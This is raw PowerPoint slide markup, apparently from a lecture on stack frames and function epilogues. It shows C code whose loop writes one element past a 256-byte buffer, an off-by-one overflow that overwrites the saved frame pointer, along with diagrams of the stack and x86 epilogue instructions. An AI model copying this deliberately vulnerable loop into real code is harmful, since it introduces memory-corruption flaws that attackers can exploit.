              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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for(</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 0;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&lt;= 256;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buffer[</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1112090" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1112083" idx="1"/>
            <a:endCxn id="1112066" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2217504" y="4492067"/>
            <a:ext cx="4259497" cy="1251509"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1112091" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1112082" idx="1"/>
            <a:endCxn id="1112086" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71000005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1112092" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1112081" idx="1"/>
            <a:endCxn id="1112073" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="4143375"/>
            <a:ext cx="1588" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112093" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112095" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141068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20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120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120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1208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1208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120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1209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1206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111206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1207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1207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1207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1207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1207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1207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1208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12086"/>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111209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1209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11209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11208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11208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11209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11208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1120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2066" grpId="0"/>
      <p:bldP spid="1112067" grpId="0"/>
      <p:bldP spid="1112068" grpId="0"/>
      <p:bldP spid="1112069" grpId="0" animBg="1"/>
      <p:bldP spid="1112069" grpId="1" animBg="1"/>
      <p:bldP spid="1112070" grpId="0" animBg="1"/>
      <p:bldP spid="1112071" grpId="0" animBg="1"/>
      <p:bldP spid="1112072" grpId="0" animBg="1"/>
      <p:bldP spid="1112073" grpId="0" animBg="1"/>
      <p:bldP spid="1112078" grpId="0" animBg="1"/>
      <p:bldP spid="1112079" grpId="0" animBg="1"/>
      <p:bldP spid="1112080" grpId="0" animBg="1"/>
      <p:bldP spid="1112081" grpId="0" animBg="1"/>
      <p:bldP spid="1112082" grpId="0" animBg="1"/>
      <p:bldP spid="1112083" grpId="0" animBg="1"/>
      <p:bldP spid="1112084" grpId="0" animBg="1"/>
      <p:bldP spid="1112085" grpId="0" animBg="1"/>
      <p:bldP spid="1112086" grpId="0" animBg="1"/>
      <p:bldP spid="1112087" grpId="0"/>
      <p:bldP spid="1112088" grpId="0"/>
      <p:bldP spid="1112093" grpId="0" animBg="1"/>
      <p:bldP spid="1112093" grpId="1" animBg="1"/>
    </p:bld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4118" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1114119" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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Buffer[255]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114120" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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Buffer[254]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114121" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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Buffer[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114122" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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Int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1114124" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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14125" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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14126" name="Oval 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114127" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114128" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114129" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114130" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114131" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114132" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114133" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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14134" name="AutoShape 22"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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14135" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114136" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114137" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1114138" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1114132" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2606676" y="4557921"/>
            <a:ext cx="3870324" cy="1185654"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1114139" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1114131" idx="1"/>
            <a:endCxn id="1114135" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -57500005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1114140" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1114130" idx="1"/>
            <a:endCxn id="1114135" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32300005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114141" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114142" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2686050"/>
            <a:ext cx="2057400" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="64000"/>
            </a:schemeClr>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1114144" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="286882" y="2105300"/>
            <a:ext cx="3326552" cy="2086725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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for(</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 0;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&lt;= 256;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buffer[</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
